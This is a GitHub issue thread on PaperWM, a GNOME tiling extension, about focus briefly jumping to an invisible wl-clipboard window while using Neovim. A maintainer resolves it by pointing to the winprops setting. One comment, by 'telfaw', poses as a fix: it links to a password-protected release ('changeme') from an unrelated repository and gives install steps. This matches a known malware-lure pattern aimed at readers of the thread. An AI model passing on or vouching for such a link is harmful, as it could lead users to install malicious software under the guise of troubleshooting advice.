### ISSUE TITLE
ignore wl-clipboard

### ISSUE THREAD

**Issue by TheToxicToast** [paperwm/PaperWM#939]
**Describe the bug**
When running Neovim and switching windows sometimes it gets focused on a non existent window called wl-clipboard

**To Reproduce**
open Neovim
use keyboard bindings to switch windows left or right
an invisible window pops up, and when selection ends it jumps back to Neovim

**Expected behavior**
not that

**Screenshots**
[Screencast from 2024-08-29 08-43-10.webm](https://github.com/user-attachments/assets/4b3fc695-868f-4a85-9b80-a12adad25b8a)

**System information:**
Please provide system information:
Distribution: Fedora Linux 40 (Workstation Edition)
GNOME Shell: 46.4
Display server: Wayland
PaperWM version: 46.17.0
Enabled extensions:
- gsconnect@andyholmes.github.io
- just-perfection-desktop@just-perfection
- blur-my-shell@aunetx
- bluetooth-quick-connect@bjarosze.gmail.com
- clipboard-indicator@tudmotu.com
- caffeine@patapon.info
- Vitals@CoreCoding.com
- drive-menu@gnome-shell-extensions.gcampax.github.com
- paperwm@paperwm.github.com
- disable-workspace-animation@ethnarque
- hidetopbar@mathieu.bidon.ca
- user-theme@gnome-shell-extensions.gcampax.github.com
- launch-new-instance@gnome-shell-extensions.gcampax.github.com

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jtaala** [comment]
Hey @TheToxicToast,

You can do this with `winprops`, see https://github.com/paperwm/PaperWM/issues/466#issuecomment-1399223112

**Comment by jtaala** [comment]
Closing now.  Let us know if you still have issues here.
